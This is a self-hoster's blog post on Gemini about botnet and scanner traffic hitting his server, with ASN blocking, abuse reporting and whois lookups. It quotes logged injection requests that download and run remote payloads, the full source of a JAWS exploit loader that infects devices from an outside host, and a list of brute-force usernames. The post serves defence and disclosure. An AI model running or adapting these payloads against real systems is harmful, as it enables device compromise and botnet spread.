-- Leo's gemini proxy
-- Connecting to gmi.noulin.net:1965...
-- Connected
-- Sending request
-- Meta line: 20 text/gemini
date: 2024-04-02 07:57:18
categories: default
firstPublishDate: 2023-06-24 18:07:35
My server runs a web server and an ssh server, there is nothing on the web server and there is no link on the internet pointing to it, all devices connected to the internet are getting scanned.
To reduce this scanning, setup a firewall:
Related news:
Which routers? cisco and netgear:
Normally nobody would connect to port 80 since there are no links and no content, but there are lots of connections happening.
The web server gets these type accesses:
GET /.env HTTP/1.1 GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1 GET /shell?cd+/tmp;rm+-rf+*;wget+204.44.109.117/jaws;sh+/tmp/jaws HTTP/1.1 GET /proxychecker/index.php HTTP/1.1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0 HEAD /wordpress HTTP/1.1 POST /boaform/admin/formLogin HTTP/1.1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://114.225.221.114:56637/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 GET /echo.php HTTP/1.1 GET /admin/db.sql HTTP/1.1 CONNECT HTTP/1.1 GET /?Z70166322662Q1 HTTP/1.1 GET /MyAdmin/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0 GET /phpmyadmin/scripts/setup.php HTTP/1.0 GET /php/scripts/setup.php HTTP/1.0 GET /mysqladmin/scripts/setup.php HTTP/1.0 GET /phpMyAdmin/scripts/setup.php HTTP/1.0 GET /_phpMyAdmin/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0 GET /dbadmin/scripts/setup.php HTTP/1.0 GET /mysqlmanager/scripts/setup.php HTTP/1.0 GET /sqlweb/scripts/setup.php HTTP/1.0 GET /webadmin/scripts/setup.php HTTP/1.0 GET /phpmanager/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2/scripts/setup.php HTTP/1.0 GET /db/scripts/setup.php HTTP/1.0 GET /admin/phpmyadmin/scripts/setup.txt HTTP/1.0 GET /mysql/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0 GET /admin/pma/scripts/setup.php HTTP/1.0 GET /myadmin/scripts/setup.php HTTP/1.0 GET /PHPMYADMIN/scripts/setup.php HTTP/1.0 GET /pma/scripts/setup.php HTTP/1.0 GET /mysql-admin/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0 GET /websql/scripts/setup.php HTTP/1.0 GET /sqlmanager/scripts/setup.php HTTP/1.0 GET /phpma/scripts/setup.php HTTP/1.0 GET /phpMyAdmin3/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0 GET /admin/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0 GET /phpMyAdmin2/scripts/setup.php HTTP/1.0 GET /web/phpMyAdmin/scripts/setup.php HTTP/1.0 GET /php-myadmin/scripts/setup.php HTTP/1.0 GET /phpmy-admin/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0 GET /webdb/scripts/setup.php HTTP/1.0 GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0 GET /SQL/scripts/setup.php HTTP/1.0 POST /mgmt/tm/util/bash HTTP/1.1 GET /.git/HEAD HTTP/1.1 GET /nmaplowercheck1680223056 HTTP/1.1 GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1
These requests come from:
data centers: 'security research' at companies and universities, vps running malicious software, vps created and destroyed after a few hours (only the SSH port is open, these machines only scan), game servers...
ISPs: compromised computers and internet devices: routers, internet connected cameras, self-hosters...
Mobile phone operators, mobile phones running malware
To get some information about the source ips, enter the ip in the greynoise service:
There is also the abuseipdb service:
Some of the tools used to scan the machines are:
anonymous botnets
[https://en.wikipedia.org/wiki/Botnet](Botnet article on Wikipedia)
Some of the 'security research' companies are:
internet-census.org: ip 185.180.143.72 as211680 anubisnetworks.com
shodan.io: ip 198.20.69.98 census2.shodan.io as32475 singlehop.com, ip 185.142.236.41 guitar.census.shodan.io as174 cogentco.com
Theses companies map the internet and sell the data to other companies.
The 'security research' labs leave a message with contact information and one can opt out from the scan:
Ip: 38.110.46.2 Hello, This is a research scanning machine from the Georgia Institute of Technology. This machine regularly conducts scans of the entire Internet so you may have been scanned as part of an ongoing research project. If you have been or are currently being scanned and would like to opt out, please email scp-network-measurement@cc.gatech.edu with the name or address of the scanner, and the IP ranges you would like to exclude in CIDR format and we will respond immediately.
Scanning back the source ips, I found devices like:
a DVR from
running malware.
a Microtik router running RouterOS 6.34.2 (release in 2016).
a Cisco router
machines running OpenVPN CWS on a web server.
I found a service selling access to proxy servers:
When the source ip is from a mobile operator, the device is behind cgnat and is unreachable and in general it is the ip of a CISCO router.
The location of the source ips is all over the world, on some days most of the scans were coming from brazil mobile phone networks and ISPs, I think people there are running an app containing some malware... Some scans happen during the day in the source ip location so the malicious software runs on devices that people turn on and off.
To reduce the amount of scans, I have been blocking ASNs. The first blocked ASNs were the big clouds: Amazon, Azure, Google, Digital Ocean, Vutlr, Ovh,... because those clouds do a lot of scanning from many ips.
Over the course of 2 months, the scans have been coming from about 1400 ASNs, these ASNs route 1.3 billion ipv4 addresses.
[gemini://gmi.noulin.net/asns.txt](ASNs with devices scanning my server)
There are VPSes in Digital ocean distributing malware, I reported the abuse and Digital ocean terminated the user account.
Report abuses at: [https://www.digitalocean.com/company/contact/#abuse](Digital Ocean Abuse)
For all my abuse reports, I get this reply:
Subject: New Intrusion/Exploit Abuse Form Submission Hello, Thank you for the report. We have notified the appropriate customers. We appreciate your efforts in helping to clean up the internet! Regards, Security Operations Center DigitalOcean
In a darknet forurm, I saw this:
alternatives to digital ocean? was trying to set up a cpanel and scampage for spamming but digital ocean keeps banning my accounts when i create them and i have a good set up and using my own bank drop cards to open.... 1984hosting or buyvm net good alternatives? what difference will i need to do one these sites compared to creating a droplet like on digital ocean to start my cpanel?
AWS, Microsoft and Google also have abuse report pages: [https://aws.amazon.com/forms/report-abuse](AWS abuse) [https://msrc.microsoft.com/report/abuse](Microsoft abuse) [https://support.google.com/code/contact/cloud_platform_report?hl=en](Google abuse)
The web server gets a lot of request like this `/shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws`, I searched for the program generating these requests and I found a version of the script trying to upload jaws: [https://github.com/R00tS3c/DDOS-RootSec/blob/master/Botnets/Exploits/JAWS/jaws_loader.py](Jaws loader github)
#Jaws Exploit Loader import random, socket, time, sys, requests, re, os from multiprocessing import Process if len(sys.argv) < 2: sys.exit("usage: python %s <input list> <port>" % (sys.argv[0])) bin_names = ["ARM7", "ARM4"] list = open(sys.argv[1], "r").readlines() port = sys.argv[2] def send_payload(target): for names in bin_names: print "[JAWS/1.0] attempting to infect %s with bin %s" % (target, names) url = "http://" + target + ":" + port + "/shell?cd /tmp; echo >NiGGeR || cd /var; echo >NiGGeR; cp /bin/busybox yeet; >yeet; chmod 777 yeet; nohup wget http:/\/209.66.128.162:80/%s -O yeet || nohup tftp -r %s -g 209.66.128.162 -l yeet; chmod 777 yeet;./yeet; rm -rf yeeter >/dev/null 2>&1" % (names, names) try: output = requests.get(url, timeout=3) if output.status_code == int('200'): print "[JAWS/1.0] infected %s" % (target) file_h = open("jaws_infected.txt", "a+") file_h.write(target + "\n") file_h.close() break except: pass for i in open(sys.argv[1]).readlines(): try: i = i.strip("\r\n") t = Process(target=send_payload, args=(i,)) t.start() except KeyboardInterrupt: os.kill(os.getpid(), 9) except: pass
Some machines are running a version of the mirai botnet, on port 1024 I got:
Welcome to the Yugi v4 Mirai Variant! # scan the machines with nmap: nmap -sS -O 109.205.213.41 Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-10 07:16 +02 Nmap scan report for 109.205.213.41 Host is up (0.094s latency). Not shown: 995 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 1024/tcp open kdm 3306/tcp open mysql Device type: general purpose Running: Linux 4.X OS CPE: cpe:/o:linux:linux_kernel:4.4 OS details: Linux 4.4 Network Distance: 19 hops
WIRED wrote an article about the creators of the mirai bot:
The SSH service is the most scanned, the botnets scanning SSH are more widespread than the ones scanning the web servers. These scans come from the same type of networks (data centers, ISPs, mobile networks) and from more geographical locations. I use rate limiter (fail2ban and sshguard) and I get 3 login attempts per minute from 200 ips a day from these type of machines:
Linux Servers
Android devices
Android devices are the majority of devices scanning the SSH services when they are connected to Wifi and mobile networks. I haven't found any information about which apps run these botnets.
Maybe there is some information on github: [https://github.com/topics/android-botnet](Android botnet topic on github)
The botnets use the root username most of the time and also try many other usernames, some of them are:
.log 123!@# 159casia@yhy357 Cmadaas@2019 NetAdmin Wanglei00 a adam adfexc adm admin admin1234 alan an appldev aqswdefr bds black bpsolutions build byzoro cactiuser cluster com cvs debian deployer dev didichan dmdba dpoint dreambox elk es flw ftp_user ftpadmin gandalf graphic greenplum guest hadoop hhm huawei hxhtftp hxhttp hyper information inspur invoice jboss jenkins jhj jiangyue john jtx9d321 jysong kafka lafe lenovo liuyichen lixiaoke localhost lsfadmin lsh lxc maowd matt minecraft myapn_cen nadmin nagios njzt nmsuser now5 nvidia odoo openpose oracle oracletest osboxes ossuser owa prabha prueba ps qlli qwy robertlu root rzchi secadd share shiluj shop shopdb steam student suahn21 subzero swsong tao test test1 test2 thl tiago tiankong314 tippy tomcat tve ubuntu ubuntu1 uftp usearch user user0 user01 user5 vbox vps web webadmin webapp wocloud wsm wuhz wwwlog xiangliyao yskwon yuelv za zhangby zhangyi zhasen zhouxy zone zxcasd
There are mobile phone with botnets preinstalled: [https://www.techspot.com/news/98667-millions-android-phones-come-pre-installed-malware-there.html](Preinstalled botnets on android phones)
I want to be able monitor the connection from my android phone and I found the netguard app which works as a firewall but it creates a VPN which drains the battery. It would be better to have access to nftables and iptables since android runs linux.
There is a service that gives the email address to report abuse for an ip address:
Most of the time, I don't get a reply to my abuse report.
I have got this reply from MVPS.net:
Thank you for the notification. We've suspended the service. Kind Regards, MVPS.net Abuse
I sent an abuse email to JPNIC, I thought it was the ISP because the domain is `nic.ad.jp` and I got the email address from abuse.net. JPNIC replied telling me to use whois:
whois -h whois.nic.ad.jp 210.149.68.157/e [ JPNIC database provides information regarding IP address and ASN. Its use ] [ is restricted to network administration purposes. For further information, ] [ use 'whois -h whois.nic.ad.jp help'. To only display English output, ] [ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ] Network Information: a. [Network Number] 210.149.68.0/24 b. [Network Name] T-CLOUD-2 g. [Organization] Thomas of America m. [Administrative Contact] AS30773JP n. [Technical Contact] AS30773JP o. [Abuse] p. [Nameserver] ns1.raservers.net p. [Nameserver] ns2.raservers.net [Assigned Date] 2020/10/07 [Return Date] [Last Update] 2020/12/21 13:17:03(JST) Less Specific Info. ---------- Internet Initiative Japan Inc. [Allocation] 210.149.0.0/16 More Specific Info. ---------- No match!!
The contact information is `AS30773JP`, it is an ASN. So I queried JPNIC about this ASN:
whois -h whois.nic.ad.jp ^AS30773JP [ JPNIC database provides information regarding IP address and ASN. Its use ] [ is restricted to network administration purposes. For further information, ] [ use 'whois -h whois.nic.ad.jp help'. To only display English output, ] [ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ] Contact Information: a. [JPNIC Handle] AS30773JP c. [Last, First] Sogi, Akiyuki d. [E-Mail] support@1strentalserver.com g. [Organization] Thomas of America l. [Division] Hosting devision n. [Title] o. [TEL] p. [FAX] y. [Reply Mail] apply@iij.ad.jp [Last Update] 2020/10/05 10:53:03(JST) db-staff@nic.ad.jp
I suppose the abuse email address is on the d line.
The address of the RIRs whois databases are:
APNIC WHOIS(whois.apnic.net) ARIN WHOIS(whois.arin.net) AfriNIC WHOIS(whois.afrinic.net) JPNIC WHOIS(whois.nic.ad.jp) LACNIC WHOIS(whois.lacnic.net) RIPE WHOIS(whois.ripe.net)
With whois, I sometimes get the abuse email directly:
whois -h whois.apnic.net 203.114.102.173 % [whois.apnic.net] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html % Information related to '203.114.96.0 - 203.114.127.255' % Abuse contact for '203.114.96.0 - 203.114.127.255' is 'abuse@totisp.net' inetnum: 203.114.96.0 - 203.114.127.255 netname: TOTNET-AP descr: TOT public company limited descr: Telecommunication Provider, Network Service Provider (NSP) descr: Internet Service Provider (ISP) in Thailand country: TH org: ORG-TPCL1-AP admin-c: pa82-ap tech-c: tk56-ap tech-c: SS110-AP abuse-c: AT950-AP status: ALLOCATED PORTABLE remarks: ------------------------------------------------ remarks: This object can only be modified by APNIC hostmaster remarks: If you wish to modify this object details please remarks: send email to hostmaster@apnic.net with your organisation remarks: account name in the subject line. remarks: ------------------------------------------------ mnt-by: APNIC-HM mnt-lower: MAINT-TH-TOT mnt-routes: MAINT-TH-TOT mnt-irt: IRT-TOT-TH last-modified: 2020-07-09T07:13:24Z source: APNIC
To list the networks belonging to an AS with whois, query radb like this:
whois -h whois.radb.net -- '-i origin AS134166' route: 203.114.102.0/24 descr: CAT route object for TOT origin: AS134166 mnt-by: MAINT-THIX-CAT-TH changed: catdb@cat.net.th 20160112 source: RADB route: 1.179.247.0/24 descr: CAT route object for TOT origin: AS134166 mnt-by: MAINT-THIX-CAT-TH changed: catdb@cat.net.th 20160125 source: RADB ... # LIST ipv4 NETWORKS ONLY: whois -h whois.radb.net -- '-i origin AS134166'| grep -Eo "([0-9.]+){4}/[0-9]+"|sort -u 113.53.228.0/24 1.179.246.0/23 1.179.246.0/24 1.179.247.0/24 118.174.10.0/24 118.174.11.0/24 118.174.8.0/22 118.174.8.0/24 118.174.9.0/24 118.175.1.0/24 118.175.28.0/24 180.180.242.0/23 180.180.242.0/24 180.180.243.0/24 180.180.244.0/23 180.180.244.0/24 180.180.245.0/24 180.180.247.0/24 203.113.10.0/24 203.113.11.0/24 203.113.12.0/24 203.113.124.0/24 203.113.125.0/24 203.113.126.0/24 203.113.14.0/24 203.113.15.0/24 203.113.25.0/24 203.113.4.0/24 203.113.5.0/24 203.113.6.0/24 203.113.70.0/24 203.113.7.0/24 203.113.71.0/24 203.113.8.0/22 203.113.8.0/24 203.113.9.0/24 203.113.95.0/24 203.114.100.0/24 203.114.102.0/24 203.114.112.0/24 203.114.116.0/24 203.114.96.0/24 203.114.97.0/24 203.114.98.0/24 203.114.99.0/24
The list of networks I get with these queries is not accurate, some networks belong to other ASNs, I prefer to ip2location
Every day I'm adding ASNs to the list, but now I'm getting 2 to 5 bruteforce login attempts a day on the SSH service, which is low compare to where it was at the begining.
Related article:
Hashtags: #botnet #malware #security #exploits #zombie #abuse #whois
-- Response ended
-- Page fetched on Mon May 6 13:30:01 2024